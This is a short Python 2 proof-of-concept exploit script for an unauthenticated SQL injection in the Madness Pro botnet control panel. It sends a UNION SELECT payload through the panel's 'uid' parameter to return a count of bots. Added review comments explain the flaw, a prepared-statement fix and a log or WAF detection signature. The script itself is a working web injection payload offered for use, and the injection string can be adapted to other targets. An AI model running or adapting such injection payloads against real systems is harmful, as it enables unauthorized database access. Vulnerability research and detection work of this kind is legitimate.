#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Exploit Title: Madness Pro <= 1.14 SQL injection
# Date: June 05, 2014
# Exploit Author: @botnet_hunter
# Version: 1.14
# Tested on: Apache2 - Ubuntu - MySQL
#              ▄▄▌        ▄▄▄▄·       ▄▄▄▄▄      • ▌ ▄ ·.  ▄· ▄▌
#              ██•  ▪     ▐█ ▀█▪▪     •██  ▪     ·██ ▐███▪▐█▪██▌
#              ██▪   ▄█▀▄ ▐█▀▀█▄ ▄█▀▄  ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▐█▌▐█▪
#              ▐█▌▐▌▐█▌.▐▌██▄▪▐█▐█▌.▐▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌ ▐█▀·.
#              .▀▀▀  ▀█▄▀▪·▀▀▀▀  ▀█▄▀▪ ▀▀▀  ▀█▄▀▪▀▀  █▪▀▀▀  ▀ •
#   ▄▄· ▄• ▄▌▄▄▄  ▪   ▐ ▄  ▄▄ •     • ▌ ▄ ·.  ▄▄▄· ·▄▄▄▄   ▐ ▄ ▄▄▄ ..▄▄ · .▄▄ ·
#  ▐█ ▌▪█▪██▌▀▄ █·██ •█▌▐█▐█ ▀ ▪    ·██ ▐███▪▐█ ▀█ ██▪ ██ •█▌▐█▀▄.▀·▐█ ▀. ▐█ ▀.
#  ██ ▄▄█▌▐█▌▐▀▀▄ ▐█·▐█▐▐▌▄█ ▀█▄    ▐█ ▌▐▌▐█·▄█▀▀█ ▐█· ▐█▌▐█▐▐▌▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄
#  ▐███▌▐█▄█▌▐█•█▌▐█▌██▐█▌▐█▄▪▐█    ██ ██▌▐█▌▐█ ▪▐▌██. ██ ██▐█▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█
#  ·▀▀▀  ▀▀▀ .▀  ▀▀▀▀▀▀ █▪·▀▀▀▀     ▀▀  █▪▀▀▀ ▀  ▀ ▀▀▀▀▀• ▀▀ █▪ ▀▀▀  ▀▀▀▀  ▀▀▀▀
#
# Unauthenticated SQL injection in Madness Pro panel <= 1.14
# Proof of Concept retrieves a count of the bots, although it can be utilized for far more
# Discovered and developed by bwall @botnet_hunter
#
# References:
#   http://blog.cylance.com/a-study-in-bots-lobotomy
#
# Review notes (defender's view):
#   - The injectable input is the `uid` GET parameter of the panel's index
#     page; the value below is never bound as a query parameter, so the
#     panel concatenates it straight into SQL.  Fix on the panel side is to
#     pass `uid` through a prepared statement / bound parameter.
#   - Detection: a `uid` value containing a single quote followed by
#     `UNION ALL SELECT` (URL-encoded as %20 separators here) is the
#     signature of this request; it can be matched in web-server access
#     logs or by a WAF rule on that parameter.
#   - This is Python 2 code (print statement, urllib.urlopen); it will not
#     run under Python 3 without porting.

import urllib


# Fill in URL that Madness Pro bot connects back to
# Left empty on purpose: with "" the call below hands urlopen a relative
# URL, so the script errors out rather than contacting anything until a
# URL is deliberately supplied (presumably intended; verify locally).
panel_url = ""


def run_sqli_proof_of_concept(panel_index_url):
    """Send one GET to the panel index page with the injected `uid` and print the body.

    The injected value turns the panel's own query into a UNION of four
    columns, the fourth being `CONCAT('bot-count:', COUNT(*))` over the
    `bots` table, so a vulnerable panel echoes a `bot-count:<N>` string in
    its response.  `panel_index_url` is used verbatim as the URL prefix;
    no error handling is performed, so a connection failure or a non-200
    response raises/prints whatever urllib returns.
    """
    # The `--` tail comments out the remainder of the panel's original query.
    f = urllib.urlopen("{0}?uid='%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,CONCAT('bot-count:',COUNT(*))%20FROM%20bots"
                       "%20--%20--".format(panel_index_url))
    # Prints the raw HTML; the response object is not closed explicitly.
    print f.read()


# Module runs the request at import/exec time; there is no __main__ guard.
run_sqli_proof_of_concept(panel_url)